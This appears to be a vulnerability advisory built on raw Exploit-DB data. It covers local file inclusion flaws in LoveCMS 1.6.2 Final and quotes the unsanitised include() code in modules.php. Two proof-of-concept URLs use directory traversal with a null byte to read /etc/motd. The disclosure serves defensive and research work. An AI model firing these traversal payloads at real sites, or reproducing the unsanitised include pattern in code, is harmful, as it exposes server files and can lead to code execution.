LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities

vendor:

LoveCMS

by:

cOndemned

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: LoveCMS

Affected Version From: 1.6.2 Final

Affected Version To: 1.6.2 Final

Patch Exists: YES

Related CWE: N/A

CPE: lovecms:lovecms:1.6.2_final

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities

LoveCMS 1.6.2 Final is vulnerable to multiple Local File Inclusion vulnerabilities. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'install' and 'uninstall' parameters of the '/system/admin/modules.php' script. A remote attacker can exploit this vulnerability to include arbitrary local files and execute arbitrary code on the vulnerable system. The attacker can also include sensitive files from the web server and view their contents.

Mitigation:

Upgrade to the latest version of LoveCMS 1.6.2 Final or apply the patch from the vendor.

Source

Exploit-DB raw data:

LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities
found by cOndemned
vendor: http://lovecms.org/
download: http://sourceforge.net/project/showfiles.php?group_id=168535

source of /system/admin/modules.php

	13.	if(isset($_GET['install']))
	14.	{
	15.		$include = $_GET['install'];
	16.		
	17.		include(LOVE_ROOT . '/modules/' . $include . '/info.php');

	[...]

	61.	if(isset($_GET['uninstall']))
	62.	{
	63.		$include = $_GET['uninstall'];
	64.		
	65.		include(LOVE_ROOT . '/modules/' . $include . '/info.php');


proof of concept

	http://[host]/[lovecms]/system/admin/modules.php?install=../../../../../etc/motd%00
	http://[host]/[lovecms]/system/admin/modules.php?uninstall=../../../../../etc/motd%00